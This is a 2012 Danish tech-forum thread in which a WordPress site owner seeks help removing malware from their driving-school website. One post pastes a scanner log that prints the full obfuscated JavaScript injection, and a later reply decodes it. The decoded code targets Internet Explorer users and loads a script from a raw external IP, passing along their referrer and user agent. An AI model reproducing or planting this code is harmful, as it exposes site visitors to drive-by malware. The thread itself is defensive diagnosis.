CIO Tech Eksperten IT-JOB IT-Kurser Events Podcast Søg
Cookie ikon
Avatar billede Skipper235 Nybegynder
20. februar 2012 - 21:59 Der er 9 kommentarer

Virus på hjemmeside - Har prøvet det meste

Hej allesammen,

Jeg er desværre ramt af noget virus på denne her hjemmeside om køreskoler : http://koereskolerne.dk/

Hvis du kører med Norton, som jeg gør, burde det ikke være farligt at besøge den.

Jeg har prøvet næsten alt, har Googlet, læst, testet og spurgt andre. Men det er tilsyneladende en ret sjælden virus, som er svær at slippe af med.

Jeg håber i kan hjælpe :)
Avatar billede zoso Novice
20. februar 2012 - 22:16 #1
Hvorfor i alverden ligger du et link ud med virus!?
Avatar billede Skipper235 Nybegynder
20. februar 2012 - 22:20 #2
Jeg skriver jo at det er der. Man kan jo bare lade være med at trykke. Hvis man har Norton, så sker der ikke noget. Jeg kender en del har trykket, uden at der er sket noget.

Jeg har brug for hjælp. Hvis man kan hjælpe mig, så ville jeg være glad.
Avatar billede 220661 Ekspert
20. februar 2012 - 22:43 #3
Kører ikke Norton men var lige inde på siden alligevel.
Hvor på denne side vil man få virus på pc hvis man trykker??
Har ikke bevæget mig rundt på siden.
Skulle man ikke kontakte dem??
Mail : info@koereskolerne.dk
Avatar billede 220661 Ekspert
20. februar 2012 - 22:44 #4
Ups det er din hjemmeside. Så det kun lige.
Avatar billede Slettet bruger
20. februar 2012 - 23:01 #5
Man skal nu heller ikke stole blindt på sine antivirus programmer.
Jeg kan se siden henter noget indhold (mest javascript) fra forskellige russiske domæner. Om det er med vilje ved jeg ikke.
Men jeg ville nok stole mere på siden hvis den selv hostede de javascript filer.
Tror lige jeg vil geninstallere mit OS i min virtual box, bare for at være på den sikre side. :)
Avatar billede Skipper235 Nybegynder
20. februar 2012 - 23:12 #6
Hvad betyder det at geninstallere i sin virtual box ?

:)
Avatar billede Skipper235 Nybegynder
20. februar 2012 - 23:13 #7
Det er en virus som åbenbart gemmer sig. Nogle gange reagerer mit antivirus, andre gange ikke. Det er et ret sofistikeret virus. Jeg har læst lidt om det, men jeg fattede ikke meget af den tekniske snak
Avatar billede Skipper235 Nybegynder
20. februar 2012 - 23:18 #8
Jeg har denne her log :


Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjs69693
var _0xa687=["\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x6D\x73\x69\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x6F\x70\x65\x72\x61","\x77\x65\x62\x74\x76","\x77\x69\x6E\x64\x6F\x77\x73","\x61\x68\x6B\x72\x61\x68","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x33\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];var ua=navigator[_0xa687[1]][_0xa687[0]]();if(((ua[_0xa687[3]](_0xa687[2])!=-1&&ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;
Malware found on javascript file:
http://koereskolerne.dk/wp-content/plugins/gd-star-rating/js/gdsr.js?ver=1.9.13
Malware found on javascript file:
http://koereskolerne.dk/wp-content/plugins/share-buttons/js/share-buttons.js?ver=3.3.1
Malware found on javascript file:
http://koereskolerne.dk/wp-content/plugins/share-buttons/js/odkl_init.js?ver=3.3.1
Malware found on javascript file:
http://koereskolerne.dk/wp-content/themes/Karma/truethemes_framework/js/truethemes.js?ver=2.0
Malware found on javascript file:
http://koereskolerne.dk/wp-content/themes/Karma/truethemes_framework/js/jquery.cycle.all.min.js?ver=2.9.4
Malware found on javascript file:
http://koereskolerne.dk/wp-content/themes/Karma/truethemes_framework/js/jquery.prettyPhoto.js?ver=1.0
Malware found on javascript file:
http://koereskolerne.dk/wp-includes/js/comment-reply.js?ver=1.0
Malware found on javascript file:
http://koereskolerne.dk/wp-content/themes/Karma/truethemes_framework/js/superfish.js?ver=1.0
Malware found on javascript file:
http://koereskolerne.dk/wp-content/themes/Karma/truethemes_framework/js/hoverIntent.js?ver=1.0
Security warning in the URL:
http://koereskolerne.dk
Security warning in the URL:
http://koereskolerne.dk/404testpage4525d2fdc
Security warning in the URL:
http://koereskolerne.dk/404javascript.js
Security warning in the URL:
http://koereskolerne.dk/koereskoler-koebenhavn/
Security warning in the URL:
http://koereskolerne.dk/koereskoler-i-aarhus/
Security warning in the URL:
http://koereskolerne.dk/koereskoler-i-odense/
Security warning in the URL:
http://koereskolerne.dk/blog/
Security warning in the URL:
http://koereskolerne.dk/kontakt/
Avatar billede Slettet bruger
20. februar 2012 - 23:41 #9
Prøvede for sjov at se hvad "var _0xa687" array'et fra #8 indeholdt:
0: toLowerCase
1: userAgent
2: msie
3: indexOf
4: opera
5: webtv
6: windows
7: ahkrah
8: getElementById
9: location
10: referrer
11: script
12: createElement
13: id
14: src
15: http://31.184.242.103/s.php?ref=
16: &lc=
17: &ua=
18: head
19: getElementsByTagName
20: appendChild
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Se alle it-kurser fra Computerworld Kurser
IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.
Se alle it-kurser

Flere spørgsmål fra Virus kategorien

Titel Indlæg Oprettet Seneste aktivitet
Findes der mon et Antivirus program, som ikke, konstant, reklamerer, for at købe ? Af Ikke-ekspert i Virus 21 22/06/202419:22 23/06/202412:54
Anbefaling af antivirusprogram med firewall Af OnePlusFan i Virus 23 07/05/202421:02 13/05/202419:48
trusler Af gerhardpet i Virus 4 26/01/202410:02 27/01/202408:32
Kan ikke fjerne virus Af mik28 i Virus 16 09/01/202416:37 10/01/202419:59
virusscanning Af JetteD i Virus 2 10/11/202312:55 10/11/202316:36
Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Opret Log ind

Du kan også logge ind via nedenstående tjenester



Alle kategorier på Eksperten
Seneste spørgsmål Seneste aktivitet
I dag 19:15 Personlige indstillinger på Facebook Af nu_igen i Sociale medier
I dag 17:56 Bluetooth Højttalersæt Af valby i Andet hardware
I dag 16:52 Flextids registrering Af Kenneth Kirsgart i Excel
I dag 14:28 Telenor og Iphone skal genstarte ofte Af Carpathia i Mobilnetværk
I dag 13:47 Kan man sælge et ApS Af LHans i Fri debat
White papers
Flere white papers »


Premium
Teaser billede
Efter forbud fra Datatilsynet: Nu ændres data-håndteringen i din kørekort-app
Læs mere »
Halter mange år bagefter: Sløve software-udviklere står i vejen for kæmpe digitalt løft af Billund Lufthavn
Disse 10 it-virksomheder klarer sig bedst i Computerworlds store image-undersøgelse
Rejsekort skal aflevere fuld redegørelse om brug af GPS-data i Rejsekort-appen inden for få uger: Datatilsynet åbner sag
Se alle »
Computerworld
Teaser billede
Softwarefirmaet Teamviewer med 640.000 kunder globalt ramt af avanceret hackerangreb
Læs mere »
En pladesaks, 1000W og et Nvidia-grafikkort til 14.000 kroner - sådan opgraderede jeg min pc
Dansk-stiftet ingeniørfirma blev franarret 178 millioner kroner i deepfake-svindel
Test: Endelig en skærm der er god til alt - lige fra gaming og underholdning til kontorbrug
Se alle »
CIO
Teaser billede
Efter stort hackerangreb mod Teamviewer: Stop dine opdateringer og tjek opsætningen nu
Læs mere »
I dag træder nye de regler om registrering af din arbejdstid i kraft: Er du klar?
Frygtet melding: Russiske hackere har stjålet Microsoft-kunders e-mails
Russisk hack af Microsoft er meget større end først antaget
Se alle »
Job & Karriere
Teaser billede
Bo solgte sit software-system for et treciftret millionbeløb: Brugte pengene på at købe 80 medarbejdere til ny storsatsning
Læs mere »
Norlys skal splittes op i fem selskaber: Nu bliver flere ansatte og ledere fyret
Dansk top-profil trækker sig fra Microsoft: Skal være direktør i TDC Erhverv
Kontorer er ofte øde og tomme - især efter frokost og op til ferier: Nu vil Dell give de ansatte farve-stempler efter deres fremmøde
Se alle »
White paper
Teaser billede
Sådan høster du forretningsfordelene ved Internet of Things
Læs mere »
Sæt turbo på din cloudperformance og minimér risikoen for DDoS-angreb
Opdag fordelene ved cloud-baseret backup og recovery
Det behøver ikke at gøre ondt: Sådan gør du livet lettere for kunder med multicloud
Se alle »

Events
Flere events »
White papers
Flere white papers »
IT-Kurser
Se alle vores it-kurser »